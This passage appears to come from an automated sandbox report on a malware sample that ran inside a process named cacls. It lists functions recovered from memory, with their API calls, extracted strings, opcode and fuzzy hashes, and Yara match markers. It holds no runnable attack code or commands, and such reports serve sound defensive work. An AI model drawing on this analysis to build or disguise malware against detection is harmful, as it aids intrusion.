                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
                                                            • Instruction ID: bfd43d71f6fdd0d4b884ff8f1078d6eb03fb3e3cea941976228436149c6c0f13
                                                            • Opcode Fuzzy Hash: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
                                                            • Instruction Fuzzy Hash: 96F0653234025476D331A6A98C43FEBA79D8F81750F140459F749AB2C5DAA1B945C3A8
                                                            Function 00BE84A7 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00BE2040,00BF834F,00BF5A0E,00BE2006), ref: 00BE84E3
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
                                                            • Instruction ID: 8365241270d2bd2545916215b3cbe496c804806a95c98d1535d514652d33c5ab
                                                            • Opcode Fuzzy Hash: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
                                                            • Instruction Fuzzy Hash: 5EE092362402057BF610DBE5DC47F56729CC701791F0446E8FE0CDB2C2EA25E62096E5
                                                            Function 00BF9B90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00BE1D39,?,00BF62C8,00BE1D39,00BF5A0E,00BF62C8,?,00BE1D39,00BF5A0E,00001000,?,?,?), ref: 00BF9BCC
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                            • Instruction ID: bee190e263f195daf4c1ac0be8464e6f74d4eef8bb9575c50361c21716ab2bba
                                                            • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                            • Instruction Fuzzy Hash: 76E06D72200208BBC614EE58DC41FEB73ACDFC9710F004409F909A7241DA70B915CBF4
                                                            Function 00BF9BE0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,00BE4101,000000F4), ref: 00BF9C1F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                            • Instruction ID: 21044b6a456a7c39009db4168e31aee5602e742f031aa9d25ab0b55c5bab7187
                                                            • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                            • Instruction Fuzzy Hash: 36E06D712002087BC614EE99DC41FEB73ACEFC5710F004449F908A7241DA70B955CBB5
                                                            Function 00BE86B9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00BE86EC
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
                                                            • Instruction ID: 260db1c8b030a12400d5ebbffb81c7f9b563ed1f6b5c477d88809295dd7ec839
                                                            • Opcode Fuzzy Hash: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
                                                            • Instruction Fuzzy Hash: 21E0DF71200B082FEA24AE6CCC52FA233989B08724F544A90B95CDF3D6DF39F9025258
                                                            Function 00BE86C0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00BE86EC
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
                                                            • Instruction ID: 06c6d33ee7bdec2db8a2ba7a4432b4fee5b8839d6ea01d911f457827bcb9fa99
                                                            • Opcode Fuzzy Hash: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
                                                            • Instruction Fuzzy Hash: 0FE0D8312007041BE6245AACDC41F61338C9748724F440590B95CCF2D1DA38F9015154
                                                            Function 00BE84B0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00BE2040,00BF834F,00BF5A0E,00BE2006), ref: 00BE84E3
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
                                                            • Instruction ID: 5df15b35c3f94b0d5ebf913abd3eb5c382e8ca467d64f53a034c0a97059bd588
                                                            • Opcode Fuzzy Hash: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
                                                            • Instruction Fuzzy Hash: 9DD05E723403093BF610E6E9CC03F1632CC8B05790F0548A4BA4CDB3C2EA65F60046A9
                                                            Function 03852C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 66fec827fd0e16ca67add6bbfa40072ad633f55ae0c95e746a0bffbfc5ca1f6f
                                                            • Instruction ID: 9523a707231459e31fae3626f8c0c23d1e041e2984e9a571f35a46fe233f1815
                                                            • Opcode Fuzzy Hash: 66fec827fd0e16ca67add6bbfa40072ad633f55ae0c95e746a0bffbfc5ca1f6f
                                                            • Instruction Fuzzy Hash: AEB09B719015C5C9DA11E7A04A08717790467D0741F29C4E1E7074641F4739C5D5E176

                                                            Non-executed Functions

                                                            Function 00BD9E46 Relevance: 22.6, Strings: 18, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "n$)t$,$/a$8n$=G$@$B`$Pq$Yu$Z4$jJ$p$us$x`$z`$q$~
                                                            • API String ID: 0-2356214696
                                                            • Opcode ID: c875c6ec67383d0d29adbdb32ef9365de5f47e6b0581c40d81612fe4a3a91e5d
                                                            • Instruction ID: 8278ad37f4dcf6c7fbdecf022d2d18d2d39510085ddd8ec1d124f0a2873519fb
                                                            • Opcode Fuzzy Hash: c875c6ec67383d0d29adbdb32ef9365de5f47e6b0581c40d81612fe4a3a91e5d
                                                            • Instruction Fuzzy Hash: A8617CB0D05769CFEB20CF85D9587CEBAB1BB45308F1081C9D1583B281CBBA1A99CF55
                                                            Function 036004BE Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2552551045.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3600000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                            • Instruction ID: 4a23e6675ed995defea98501fe9c781399d188edd0385c38e70d8dce7564a361
                                                            • Opcode Fuzzy Hash: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                            • Instruction Fuzzy Hash: E841E57461CF094FD76CEFA890827BBB3E2FB45300F54092DD986C7292EA71D8468789
                                                            Function 00BDE4AE Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73c36f96b271d319de1f77b8161072988f165ba7113a8b2cd342946c574b8194
                                                            • Instruction ID: cf24ec8c7d3c79af9326d34dbc148c2a78a8f74aec4659ad24edb85bd5169124
                                                            • Opcode Fuzzy Hash: 73c36f96b271d319de1f77b8161072988f165ba7113a8b2cd342946c574b8194
                                                            • Instruction Fuzzy Hash: 3B21AF326062499BC721DE28A8968E5FFA4FF1661871402DFD8549B642F717C82597C1
                                                            Function 0360DF2A Relevance: 56.5, Strings: 45, Instructions: 211COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2552551045.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3600000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                            • API String ID: 0-3558027158
                                                            • Opcode ID: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                            • Instruction ID: baee78ab44aec8c4c7c44800d05cf1fd855467295a4afe1b6753d9c29b99caa1
                                                            • Opcode Fuzzy Hash: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                            • Instruction Fuzzy Hash: 25914FF04082988AC7158F55A1612AFFFB1EBC6305F15856DE7E6BB243C3BE8905CB85
                                                            Function 03852890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 0df3a5f6d5e5f040a6ee206413475dde34ef3efde1f7bff16a5e473c01fc46e5
                                                            • Instruction ID: a54cee13f22fce9d80688fa4f69d2cc347194f5aa364404fc692ec7e779dbb5b
                                                            • Opcode Fuzzy Hash: 0df3a5f6d5e5f040a6ee206413475dde34ef3efde1f7bff16a5e473c01fc46e5
                                                            • Instruction Fuzzy Hash: 5A51F9B5A0411ABFCB15EBDC898097EF7B8BB0820471485E9F8A5D7641D774DE40CBE1
                                                            Function 038C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 0cd6b5defd8d639f470ed4fe3a45a34dbc2929332820661137164c93beac7440
                                                            • Instruction ID: f1fe47487dff63b215a00d9356fe65bab63c82eaf443a7e552fc5fcd785d6f23
                                                            • Opcode Fuzzy Hash: 0cd6b5defd8d639f470ed4fe3a45a34dbc2929332820661137164c93beac7440
                                                            • Instruction Fuzzy Hash: 5251C5B5A10689AFCF60DEDCC89097FF7B9AB44204B0488EEE495D76C2D7B4DA40C760
                                                            Function 03847630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03884655
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038846FC
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03884725
                                                            • ExecuteOptions, xrefs: 038846A0
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03884787
                                                            • Execute=1, xrefs: 03884713
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03884742
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 728e58ab261e987a98d1d05a7604443950645b2b8985ebde18c5485f6841c4b6
                                                            • Instruction ID: 3fd9a1edaf379f3fb96cb60064781e023ab59b7e207dec2690491384df5979ef
                                                            • Opcode Fuzzy Hash: 728e58ab261e987a98d1d05a7604443950645b2b8985ebde18c5485f6841c4b6
                                                            • Instruction Fuzzy Hash: 86510635A0031DAEEF10EBE9DC85BAE77A9EF04304F4800E9F615EB681E7709A45CB51
                                                            Function 038E6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                            • Instruction ID: 065cecc1d7349f2334bb7ad596634d972957a40fbbf25056104451ea1a46e25d
                                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                            • Instruction Fuzzy Hash: 1A022575608341AFC704CF98C490A6FBBE5FFD9704F548AADB9958B260EB31E905CB42
                                                            Function 0385B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: 8da553665589fe1e2ee3617bf35ff440f43b0d6d00c0670b2d881e105068163f
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: 45818C74E062499FDF2ACEE8C8917AEBBA6AF65350F1C41D9FC61E7290C6349840CB51
                                                            Function 038C20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            • Opcode ID: e467d7a0443ca07d8b5aa3ca6ae7b72fade15c7d9a864329b6823a3c18486532
                                                            • Instruction ID: 9311d0070ba6d73ab3253b7dc94b5fad0487705edb450727df9824d9eaa3fca7
                                                            • Opcode Fuzzy Hash: e467d7a0443ca07d8b5aa3ca6ae7b72fade15c7d9a864329b6823a3c18486532
                                                            • Instruction Fuzzy Hash: D5216576A10259ABDB11DFF9CC40AEEB7F8EF44644F0805AAE905D7240E770E9018BA1
                                                            Function 03600388 Relevance: 7.6, Strings: 6, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2552551045.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3600000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: |de$|de$|de$|de$|de$|de
                                                            • API String ID: 0-3287866246
                                                            • Opcode ID: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                            • Instruction ID: 71293cb3c602c8690e0bdb26af1243cc0fb80f01de1192dc653f18f0fdd79240
                                                            • Opcode Fuzzy Hash: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                            • Instruction Fuzzy Hash: C4215970918B4ECFCF84EFA8D485AAEBBB0FB19300F00455AD549E7261D7349645CB96
                                                            Function 0383F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038802BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038802E7
                                                            • RTL: Re-Waiting, xrefs: 0388031E
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: c59aa909f498b93e194c199de2d815613201e7aee7a21b22da2c4a0c74840ef2
                                                            • Instruction ID: e1b9d10b26858cec81b3109f3c9a83350043f157a5ef87ef513cb3058f84bf73
                                                            • Opcode Fuzzy Hash: c59aa909f498b93e194c199de2d815613201e7aee7a21b22da2c4a0c74840ef2
                                                            • Instruction Fuzzy Hash: 25E1A175A04741AFD725DFA8C884B2AB7E0BB85314F180A9DF5A5CB3E1D774D844CB82
                                                            Function 0384BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 03887BAC
                                                            • RTL: Resource at %p, xrefs: 03887B8E
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03887B7F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: 56444b8e819d232ec38d643d4aa4d6f8c9f56aeae28450b70d927904cdc1eecc
                                                            • Instruction ID: b7c67b77407224e4d9a3ed1e703c2330f38538d7a5886cce8087a02cd7e9a90b
                                                            • Opcode Fuzzy Hash: 56444b8e819d232ec38d643d4aa4d6f8c9f56aeae28450b70d927904cdc1eecc
                                                            • Instruction Fuzzy Hash: 5C4107353007069FDB25DFA9C840B6AB7E5EF88710F140A9DF99ADB680DB31E805CB91
                                                            Function 0384B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0388728C
                                                            Strings
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03887294
                                                            • RTL: Re-Waiting, xrefs: 038872C1
                                                            • RTL: Resource at %p, xrefs: 038872A3
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: 7c2d5460556b5531dc25fd29b75365ff4ff9f347d3d6718fed039c99ae9930f6
                                                            • Instruction ID: 5fa139a2f723d5a5b5aba2c07c075b85f57f16b748eee10b33be7226f45a0e5b
                                                            • Opcode Fuzzy Hash: 7c2d5460556b5531dc25fd29b75365ff4ff9f347d3d6718fed039c99ae9930f6
                                                            • Instruction Fuzzy Hash: 5141033560024AABD711EFB8CC41B6AB7A5FB44714F240699F995DB640DB21E841C7D1
                                                            Function 038C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: 9c2c60ac1f108b9f15a83bfd4e063142b647da65f57920970a05d7fa6d164a5d
                                                            • Instruction ID: 6380ecadb85a61d255e6ad5134568adc20259ff8a5aaafe0e2ae0f01411ff591
